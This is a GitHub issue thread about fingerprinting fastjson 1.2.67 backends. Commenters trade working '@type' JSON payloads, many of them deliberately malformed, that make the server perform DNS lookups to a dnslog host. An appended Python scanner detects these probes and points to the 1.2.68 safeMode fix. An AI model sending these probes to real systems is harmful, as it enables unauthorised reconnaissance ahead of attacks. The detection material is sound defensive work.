Fastjson: the latest version 1.2.67 can still be used to tell via dnslog whether the backend uses fastjson

Created on 23 Mar 2020  ·  14 Comments  ·  Source: alibaba/fastjson

Although java.net.InetAddress has been blocked, the following two payloads can still be used to probe whether the backend is fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

All 14 comments

And autotype does not need to be enabled

Although java.net.InetAddress has been blocked, the following two payloads can still be used to probe whether the backend is fastjson

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

nice work, thx!

Here is another malformed one

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

@retanoj awesome, I happened to be talking about this payload with some other folks this afternoon too

Learned something new

The old URLDNS from ysoserial, triggered through HashMap, also works, though it is a bit malformed as well

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}

But none of these are much use; all they can do is send a DNS request

Learned

Don't know why you need to make it so malformed

{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}

Looks like the next bypass is coming soon :)

@threedr3am
Nice, make it shorter

Set[{"@type":"java.net.URL","val":"dnslog"}]

Shorter still

Set[{"@type":"java.net.URL","val":"dnslog"}

{{"@type":"java.net.URL","val":"dnslog"}:0

amazing :-)

Impressive

Can any sensitive information be obtained with this?

https://github.com/alibaba/fastjson/releases/tag/1.2.68
Version 1.2.68 provides a safeMode configuration that completely disables autoType, including both the whitelist and the blacklist.
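From the defender's side, the practical lesson of this thread is that most of the probes quoted above are not valid JSON, so any detection that first parses the request body as JSON and then inspects its keys will silently miss them. The example below, added here and not part of the thread or of the fastjson project, is a small log/request-body scanner that matches the "@type" key with a regular expression instead, labels the class names the comments above use for DNS lookups as probes, and records whether a JSON parser would have accepted each body. The sample bodies are constructed from the payloads in the thread plus benign input; the class name com.example.Order is hypothetical.

```python
import json
import re
from typing import List, Tuple

# Classes the thread shows being named in "@type" purely to trigger an
# outbound DNS lookup. These are the names quoted in the comments above.
PROBE_CLASSES = frozenset({
    "java.net.InetAddress",
    "java.net.Inet4Address",
    "java.net.Inet6Address",
    "java.net.InetSocketAddress",
    "java.net.URL",
})

# Capture the class name that follows an "@type" key. A regex is used on
# purpose: several bodies in the thread are not valid JSON, so a check that
# first runs json.loads() and then inspects keys would never see them.
AUTOTYPE_RE = re.compile(r'"@type"\s*:\s*"([A-Za-z_$][\w$.]*)"')


def find_autotype_classes(body: str) -> List[str]:
    """Return every class name given by an "@type" key anywhere in the body."""
    return AUTOTYPE_RE.findall(body)


def parses_as_json(body: str) -> bool:
    """True if the standard JSON parser accepts the body (many probes fail here)."""
    try:
        json.loads(body)
        return True
    except ValueError:
        return False


def classify(body: str) -> str:
    """'probe'    -> an @type naming one of the DNS-lookup classes above
       'autotype' -> some other @type key (review against the app's own types)
       'clean'    -> no @type key at all"""
    classes = find_autotype_classes(body)
    if any(c in PROBE_CLASSES for c in classes):
        return "probe"
    return "autotype" if classes else "clean"


def scan(bodies) -> List[Tuple[str, str, bool]]:
    """Label each body and record whether a JSON parser would have accepted it."""
    return [(b, classify(b), parses_as_json(b)) for b in bodies]


# Constructed sample request bodies, not captured traffic. The first six are
# the probe shapes quoted in the thread; the rest are app-specific or benign.
SAMPLE_BODIES = [
    '{"@type":"java.net.Inet4Address","val":"dnslog"}',
    '{"@type":"java.net.Inet6Address","val":"dnslog"}',
    '{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}',
    '{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}',
    'Set[{"@type":"java.net.URL","val":"dnslog"}',
    '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}',
    '{"@type":"com.example.Order","id":1}',        # hypothetical application class
    '{"name":"alice","type":"java.net.URL"}',       # "type" is not "@type"
    '{"user":{"id":7,"email":"a@example.com"}}',
]

if __name__ == "__main__":
    for body, label, valid in scan(SAMPLE_BODIES):
        print(f"{label:8} json_ok={str(valid):5} {body}")
```

Running the block shows every probe from the thread labelled "probe" while four of the six are rejected by json.loads(), which is exactly the gap a parse-then-inspect rule leaves open. Detection only tells you someone is fingerprinting the parser; the fix named in the last comment is to upgrade to 1.2.68 or later and turn on safeMode (ParserConfig.getGlobalInstance().setSafeMode(true), or the JVM property -Dfastjson.parser.safeMode=true), which rejects any "@type" key regardless of allow or deny lists.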
